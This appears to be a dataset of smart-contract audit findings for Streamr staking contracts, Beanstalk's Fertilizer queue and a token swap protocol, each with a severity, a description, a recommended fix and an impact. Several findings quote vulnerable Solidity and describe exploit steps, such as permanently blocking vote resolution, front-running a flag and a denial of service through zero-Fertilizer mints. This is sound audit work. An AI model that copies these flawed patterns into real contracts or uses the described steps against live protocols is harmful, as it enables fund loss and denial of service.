```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), "error_selfDelegationTooLow");\\n }\\n```\\n
Malicious target can make `_endVote()` revert forever by forceUnstaking/staking again
high
In `_endVote()`, we update `forfeitedStakeWei` or `lockedStakeWei[target]` according to the target's staking status.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n\\nWe consider the target is still active if he has a positive staking amount. But we don't know if he has unstaked and staked again, so the below scenario would be possible.\\nThe target staked 100 amount and a flagger reported him.\\nIn `onFlag()`, `lockedStakeWei[target]` = targetStakeAtRiskWei[target] = 100.\\nDuring the voting period, the target called `forceUnstake()`. Then `lockedStakeWei[target]` was reset to 0 in `Sponsorship._removeOperator()`.\\nAfter that, he stakes again and `_endVote()` will revert forever at L195 due to underflow.\\nAfter all, he won't be flagged again because the current flagging won't be finalized.\\nFurthermore, malicious operators would manipulate the above state by themselves to earn operator rewards without any risks.
Perform stake unlocks in `_endVote()` without relying on the current staking amounts.
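A hedged sketch of one possible bookkeeping fix: record at unstake time whether each lock was moved to `forfeitedStakeWei`, instead of inferring it from the current stake (the two flag mappings are hypothetical):\\n```\\n// Hypothetical per-target flags, set in _removeOperator() when locked stake\\n// is moved into forfeitedStakeWei, instead of inferring from stakedWei == 0\\nmapping(address => bool) public flaggerStakeForfeited;\\nmapping(address => bool) public targetStakeForfeited;\\n\\nfunction _endVote(address target) internal {\\n    address flagger = flaggerAddress[target];\\n    if (flaggerStakeForfeited[target]) {\\n        forfeitedStakeWei -= flagStakeWei[target];\\n    } else {\\n        lockedStakeWei[flagger] -= flagStakeWei[target];\\n    }\\n    if (targetStakeForfeited[target]) {\\n        forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n    } else {\\n        lockedStakeWei[target] -= targetStakeAtRiskWei[target];\\n    }\\n    // ... vote resolution unchanged ...\\n}\\n```\\n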
Malicious operators can bypass the flagging system by reverting `_endVote()` forever.
```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n
In `VoteKickPolicy.onFlag()`, `targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` and `_endVote()` would revert.
medium
`targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` in `onFlag()`.\\n```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n\\nFor example:\\nInitially, `streamrConfig.minimumStakeWei()` = 100 and an operator (= target) has staked 100.\\n`streamrConfig.minimumStakeWei()` is increased to 2000 after a reconfiguration.\\n`onFlag()` is called for target and `targetStakeAtRiskWei[target]` will be `max(100, 2000) * 10% = 200`.\\nIn `_endVote()`, `slashingWei = _kick(target, slashingWei)` will be 100 because the target has staked only 100.\\nSo it will revert due to underflow during the reward distribution.
`onFlag()` should check if a target has staked enough funds for rewards and handle separately if not.
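A hedged sketch of one possible guard in `onFlag()` (here the shortfall is handled by rejecting the flag; other designs, e.g. pro-rating the rewards, are equally possible):\\n```\\nuint targetStakeAtRisk = max(stakedWei[target], streamrConfig.minimumStakeWei())\\n    * streamrConfig.slashingFraction() / 1 ether;\\n// Refuse to open a flag whose flagger/reviewer rewards could not be paid\\n// out of the target's actual stake, so _endVote() cannot underflow\\nrequire(stakedWei[target] >= targetStakeAtRisk, "error_targetStakeTooLow");\\ntargetStakeAtRiskWei[target] = targetStakeAtRisk;\\n```\\n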
Operators with small staked funds wouldn't be kicked forever.
```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n
Possible front running of `flag()`
medium
The `target` might call `unstake()/forceUnstake()` before a flagger calls `flag()` to avoid a possible fund loss. Also, there would be no slash during the unstaking for `target` when it meets the `penaltyPeriodSeconds` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, "error_cannotFlagSelf");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], "error_cannotFlagAgain"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), "error_notEnoughStake");\\n require(stakedWei[target] > 0, "error_flagTargetNotStaked"); //@audit possible front run\\n```\\n
There is no straightforward mitigation but we could implement a kind of `delayed unstaking` logic for some percent of staking funds.
A malicious target would bypass the kick policy by front running.
```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, "error_cannotFlagSelf");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], "error_cannotFlagAgain"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), "error_notEnoughStake");\\n require(stakedWei[target] > 0, "error_flagTargetNotStaked"); //@audit possible front run\\n```\\n
In `Operator._transfer()`, `onDelegate()` should be called after updating the token balances
medium
In `_transfer()`, `onDelegate()` is called to validate the owner's `minimumSelfDelegationFraction` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this "delegation"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit should be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n\\nBut `onDelegate()` is called before the token balances are updated, so the scenario below is possible:\\nThe operator owner has 100 shares (the required minimum fraction), and there are no undelegation policies.\\nLogically, the owner shouldn't be able to transfer his 100 shares to a new delegator due to the min fraction requirement in `onDelegate()`.\\nBut if the owner calls `transfer(owner, to, 100)`, `balanceOf(owner)` is still 100 inside `onDelegate()` and the requirement passes, because the check runs before `super._transfer()`.
`onDelegate()` should be called after `super._transfer()`.
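A minimal sketch of the reordering, so the policy check observes post-transfer balances:\\n```\\n// Capture "new delegator" status before balances change\\nbool isNewDelegator = balanceOf(to) == 0;\\n\\nsuper._transfer(from, to, amount);\\n\\n// Run the delegation policy AFTER balances are updated, so checks such as\\n// the owner's minimum self-delegation see the post-transfer state\\nif (isNewDelegator && address(delegationPolicy) != address(0)) {\\n    moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to));\\n}\\n```\\n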
The operator owner might transfer his shares to other delegators in anticipation of slashing, to avoid slashing.
```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this "delegation"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n
`onTokenTransfer` does not validate if the call is from the DATA token contract
medium
`SponsorshipFactory::onTokenTransfer` and `OperatorFactory::onTokenTransfer` are used to handle the token transfer and contract deployment in a single transaction. But there is no validation that the call is from the DATA token contract and anyone can call these functions.\\nThe impact is low for `Sponsorship` deployment, but for `Operator` deployment, `ClonesUpgradeable.cloneDeterministic` is used with a salt based on the operator token name and the operator address. An attacker can abuse this to cause DoS for deployment.\\nWe see that this validation is implemented correctly in other contracts like `Operator`.\\n```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n
Add a validation to ensure the caller is the actual DATA contract.
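A minimal sketch of the guard for the factories, mirroring the Operator check quoted below (the `token` field name is an assumption for the DATA token the factory was configured with):\\n```\\nfunction onTokenTransfer(address sender, uint256 amount, bytes calldata param) external {\\n    // Only the real DATA token contract may trigger deploy-on-transfer\\n    if (msg.sender != address(token)) {\\n        revert AccessDeniedDATATokenOnly();\\n    }\\n    // ... existing decode-and-deploy logic ...\\n}\\n```\\n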
Attackers can prevent the deployment of `Operator` contracts.
```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n
Insufficient validation of new Fertilizer IDs allow for a denial-of-service (DoS) attack on `SeasonFacet::gm` when above peg, once the last element in the FIFO is paid
medium
A Fertilizer NFT can be interpreted as a bond without an expiration date which is to be repaid in Beans and includes interest (Humidity). This bond is placed in a FIFO list and intended to recapitalize the $77 million in liquidity stolen during the April 2022 exploit. One Fertilizer can be purchased for 1 USD worth of WETH: prior to BIP-38, this purchase was made using USDC.\\nEach fertilizer is identified by an Id that depends on `s.bpf`, indicating the cumulative amount of Beans paid per Fertilizer. This value increases each time `Sun::rewardToFertilizer` is called, invoked by `SeasonFacet::gm` if the Bean price is above peg. Therefore, Fertilizer IDs depend on `s.bpf` at the moment of minting, in addition to the amount of Beans to be paid.\\nThe FIFO list has following components:\\ns.fFirst: Fertilizer Id corresponding to the next Fertilizer to be paid.\\ns.fLast: The highest active Fertilizer Id which is the last Fertilizer to be paid.\\ns.nextFid: Mapping from Fertilizer Id to Fertilizer id, indicating the next element of a linked list. If an Id points to 0, then there is no next element.\\nMethods related to this FIFO list include: LibFertilizer::push: Add an element to the FIFO list. LibFertilizer::setNext: Given a fertilizer id, add a pointer to next element in the list LibFertilizer::getNext: Get next element in the list.\\nThe intended behaviour of this list is to add a new element to its end whenever a new fertilizer is minted with a new Id. Intermediate addition to the list was formerly allowed only by the Beanstalk DAO, but this functionality has since been deprecated in the current upgrade with the removal of `FertilizerFacet::addFertilizerOwner`.\\nConsequences of replacing BEAN:3CRV MetaPool with the BEAN:ETH Well: Before this upgrade, addition of 0 Fertilizer through `LibFertilizer::addFertilizer` was impossible due to the dependency on Curve in LibFertilizer::addUnderlying:\\n```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n\\nHowever, with the change of dependency involved in the Wells integration, this restriction no longer holds:\\n```\\n function addUnderlying(uint256 usdAmount, uint256 minAmountOut) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // Calculate how many new Deposited Beans will be minted\\n uint256 percentToFill = usdAmount.mul(C.precision()).div(\\n remainingRecapitalization()\\n );\\n uint256 newDepositedBeans;\\n if (C.unripeBean().totalSupply() > s.u[C.UNRIPE_BEAN].balanceOfUnderlying) {\\n newDepositedBeans = (C.unripeBean().totalSupply()).sub(\\n s.u[C.UNRIPE_BEAN].balanceOfUnderlying\\n );\\n newDepositedBeans = newDepositedBeans.mul(percentToFill).div(\\n C.precision()\\n );\\n }\\n\\n // Calculate how many 
Beans to add\\n uint256 newDepositedLPBeans = usdAmount.mul(C.exploitAddLPRatio()).div(\\n DECIMALS\\n );\\n\\n // Mint the Deposited Beans to Beanstalk.\\n C.bean().mint(\\n address(this),\\n newDepositedBeans\\n );\\n\\n // Mint the LP Beans to the Well to sync.\\n C.bean().mint(\\n address(C.BEAN_ETH_WELL),\\n newDepositedLPBeans\\n );\\n\\n // @audit If nothing was previously deposited this function returns 0, IT DOES NOT REVERT\\n uint256 newLP = IWell(C.BEAN_ETH_WELL).sync(\\n address(this),\\n minAmountOut\\n );\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(usdAmount);\\n }\\n```\\n\\nGiven that the new integration does not revert when attempting to add 0 Fertilizer, it is now possible to add a self-referential node to the end of the FIFO list, but only if this is the first Fertilizer NFT to be minted for the current season, by twice calling `FertilizerFacet.mintFertilizer(0, 0, 0, mode)`. The validation performed to prevent duplicate ids is erroneously bypassed given the Fertilizer amount for the given Id remains zero.\\n```\\n function push(uint128 id) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (s.fFirst == 0) {\\n // Queue is empty\\n s.season.fertilizing = true;\\n s.fLast = id;\\n s.fFirst = id;\\n } else if (id <= s.fFirst) {\\n // Add to front of queue\\n setNext(id, s.fFirst);\\n s.fFirst = id;\\n } else if (id >= s.fLast) { // @audit this block is entered twice\\n // Add to back of queue\\n setNext(s.fLast, id); // @audit the second time, a reference is added to the same id\\n s.fLast = id;\\n } else {\\n // Add to middle of queue\\n uint128 prev = s.fFirst;\\n uint128 next = getNext(prev);\\n // Search for proper place in line\\n while (id > next) {\\n prev = next;\\n next = getNext(next);\\n }\\n setNext(prev, id);\\n setNext(id, next);\\n }\\n }\\n```\\n\\nDespite first perhaps seeming harmless, this element can never be removed unless otherwise overridden:\\n```\\n function pop() internal returns (bool) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n uint128 first = s.fFirst;\\n s.activeFertilizer = s.activeFertilizer.sub(getAmount(first)); // @audit getAmount(first) would return 0\\n uint128 next = getNext(first);\\n if (next == 0) { // @audit next != 0, therefore this conditional block is skipped\\n // If all Unfertilized Beans have been fertilized, delete line.\\n require(s.activeFertilizer == 0, "Still active fertilizer");\\n s.fFirst = 0;\\n s.fLast = 0;\\n s.season.fertilizing = false;\\n return false;\\n }\\n s.fFirst = getNext(first); // @audit this gets s.first again\\n return true; // @audit always returns true for a self-referential node\\n }\\n```\\n\\n`LibFertilizer::pop` is used in `Sun::rewardToFertilizer` which is called through `Sun::rewardBeans` when fertilizing. This function is called through `Sun::stepSun` if the current Bean price is above peg. By preventing the last element from being popped from the list, assuming this element is reached, an infinite loop occurs given that the `while` loop continues to execute, resulting in denial-of-service on `SeasonFacet::gm` when above peg.\\nThe most remarkable detail of this issue is that this state can be forced when above peg and having already been fully recapitalized. 
Given that it is not possible to mint additional Fertilizer with the associated Beans, this means that a DoS attack can be performed on `SeasonFacet::gm` once recapitalization is reached if the BEAN price is above peg.
Despite being a complex issue to explain, the solution is as simple as replacing `>` with `>=` in `LibFertilizer::addFertilizer` as below:\\n```\\n function addFertilizer(\\n uint128 season,\\n uint256 fertilizerAmount,\\n uint256 minLP\\n ) internal returns (uint128 id) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n uint128 fertilizerAmount128 = fertilizerAmount.toUint128();\\n\\n // Calculate Beans Per Fertilizer and add to total owed\\n uint128 bpf = getBpf(season);\\n s.unfertilizedIndex = s.unfertilizedIndex.add(\\n fertilizerAmount.mul(bpf)\\n );\\n // Get id\\n id = s.bpf.add(bpf);\\n // Update Total and Season supply\\n s.fertilizer[id] = s.fertilizer[id].add(fertilizerAmount128);\\n s.activeFertilizer = s.activeFertilizer.add(fertilizerAmount);\\n // Add underlying to Unripe Beans and Unripe LP\\n addUnderlying(fertilizerAmount.mul(DECIMALS), minLP);\\n // If not first time adding Fertilizer with this id, return\\n// Remove the line below\\n if (s.fertilizer[id] > fertilizerAmount128) return id;\\n// Add the line below\\n if (s.fertilizer[id] >= fertilizerAmount128) return id; // prevent infinite loop in `Sun::rewardToFertilizer` when attempting to add 0 Fertilizer, which could DoS `SeasonFacet::gm` when recapitalization is fulfilled\\n // If first time, log end Beans Per Fertilizer and add to Season queue.\\n push(id);\\n emit SetFertilizer(id, bpf);\\n }\\n```\\n
It is possible to perform a denial-of-service (DoS) attack on `SeasonFacet::gm` if the Bean price is above the peg, either once fully recapitalized or when reaching the last element of the Fertilizer FIFO list.\\nProof of Concept: This coded PoC can be run by:\\nCreating file `Beantalk/protocol/test/POCs/mint0Fertilizer.test.js`\\nNavigating to `Beantalk/protocol`\\nRunning `yarn test --grep "DOS last fertilizer payment through minting 0 fertilizers"`
```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n
Use safe transfer for ERC20 tokens
medium
The protocol intends to support all ERC20 tokens but the implementation uses the plain transfer functions. Some tokens (like USDT) do not implement the EIP20 standard correctly and their transfer/transferFrom functions return void instead of a success boolean. Calling these functions with the correct EIP20 function signatures will revert.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");\\n }\\n```\\n
We recommend using OpenZeppelin's SafeERC20 versions with the safeTransfer and safeTransferFrom functions that handle the return value check as well as non-standard-compliant tokens.
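For instance, a minimal sketch of `TransferUtils::_transferERC20` rewritten with SafeERC20 (assuming OpenZeppelin v4.x import paths; the surrounding balance checks are kept from the original):\\n```\\nimport {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";\\n\\nlibrary TransferUtils {\\n using SafeERC20 for IERC20;\\n\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(address(erc20) != address(0), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n // safeTransfer reverts on failure and tolerates tokens that return no value (e.g. USDT)\\n erc20.safeTransfer(to, amount);\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");\\n }\\n}\\n```\\n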
Tokens that do not correctly implement EIP20, like USDT, will be unusable in the protocol, as the missing return value causes the transaction to revert.
```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");\\n }\\n```\\n
Fee-on-transfer tokens are not supported
medium
The protocol intends to support all ERC20 tokens, but does not support fee-on-transfer tokens. The protocol utilizes the functions `TransferUtils::_transferERC20()` and `TransferUtils::_transferFromERC20()` to transfer ERC20 tokens.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n\\nThe implementation verifies that the transfer was successful by checking that the balance of the recipient is greater than or equal to the initial balance plus the amount transferred. This check will fail for fee-on-transfer tokens because the actual received amount will be less than the input amount.\\nAlthough there are very few fee-on-transfer tokens, the protocol cannot claim to support all ERC20 tokens while these non-standard tokens remain unsupported.
The transfer utility functions can be updated to return the amount actually received, or the protocol should clearly document that only standard ERC20 tokens are supported.
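For illustration, a hedged sketch of measuring and returning the amount actually received (the exact signature of `_transferFromERC20` is assumed here, and SafeERC20 usage follows the previous recommendation):\\n```\\nfunction _transferFromERC20(address token, address from, address to, uint256 amount) internal returns (uint256 received) {\\n IERC20 erc20 = IERC20(token);\\n uint256 initialBalance = erc20.balanceOf(to);\\n erc20.safeTransferFrom(from, to, amount);\\n // return the balance delta so callers can account for any transfer fee\\n received = erc20.balanceOf(to) - initialBalance;\\n}\\n```\\n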
Fee-on-transfer tokens cannot be used with the protocol. Because of the rarity of these tokens, we evaluate this finding as a Medium risk.
```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n
Centralization risk
medium
The protocol has an owner with privileged rights to perform admin tasks that can affect users. In particular, the owner can change the fee settings and reward handler address.\\nValidation is missing for admin fee setter functions.\\n```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, "Fee percentage must be less than 1");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n\\nImportant changes initiated by the admin should be logged via events.\\n```\\nFile: helpers/FeeData.sol\\n\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n\\n function setMaxHops(uint256 maxHops) external onlyOwner {\\n\\n function setMaxSwaps(uint256 maxSwaps) external onlyOwner {\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {\\n\\n function setFeeToken(address feeTokenAddress) public onlyOwner {\\n\\n function setFeeTokens(address[] memory feeTokenAddresses) public onlyOwner {\\n\\n function clearFeeTokens() public onlyOwner {\\n```\\n\\n```\\nFile: helpers/TransferHelper.sol\\n\\n function setRewardHandler(address rewardAddress) external onlyOwner {\\n\\n function setRewardsActive(bool _rewardsActive) external onlyOwner {\\n```\\n
Specify the owner's privileges and responsibilities in the documentation.\\nAdd constant state variables that can be used as the minimum and maximum values for the fee settings.\\nAdd proper validation for the admin functions.\\nLog the changes in the important state variables via events.
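For instance, a sketch of `setFixedFee` with bounds and event logging (the `MAX_FIXED_FEE` constant and `FixedFeeUpdated` event are hypothetical names introduced for illustration):\\n```\\nuint256 public constant MAX_FIXED_FEE = 0.01 ether; // hypothetical upper bound\\n\\nevent FixedFeeUpdated(uint256 oldFee, uint256 newFee);\\n\\nfunction setFixedFee(uint256 fixedFee) external onlyOwner {\\n require(fixedFee <= MAX_FIXED_FEE, "Fixed fee exceeds maximum");\\n emit FixedFeeUpdated(_fixedFee, fixedFee);\\n _fixedFee = fixedFee;\\n}\\n```\\n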
While the protocol owner is regarded as a trusted party, the owner can change the fee settings and reward handler address without any validation or logging. This can lead to unexpected results that affect users.
```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, "Fee percentage must be less than 1");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n
Validation is missing for tokenA in `SwapExchange::calculateMultiSwap()`
low
The protocol supports claiming a chain of swaps and the function `SwapExchange::calculateMultiSwap()` is used to do some calculations including the amount of tokenA that can be received for a given amount of tokenB. Looking at the implementation, the protocol does not validate that the tokenA of the last swap in the chain is actually the same as the tokenA of `multiClaimInput`. Because this view function is supposed to be used by the frontend to 'preview' the result of a `MultiSwap`, this does not imply a direct security risk but can lead to unexpected results. (It is notable that the actual swap function `SwapExchange::_claimMultiSwap()` implemented a proper validation.)\\n```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n
Add a validation that the tokenA of the last swap in the chain is the same as the tokenA of `multiClaimInput`.
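A one-line sketch of the missing check, placed after the loop in `calculateMultiSwap` (reusing the existing `Errors.NonMatchingToken` custom error):\\n```\\n// after the loop, matchToken holds tokenA of the last swap in the chain\\nif (matchToken != multiClaimInput.tokenA) revert Errors.NonMatchingToken();\\n```\\n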
The function will return an incorrect swap calculation result if the last swap in the chain has a different tokenA than the tokenA of `multiClaimInput` and it can lead to unexpected results.
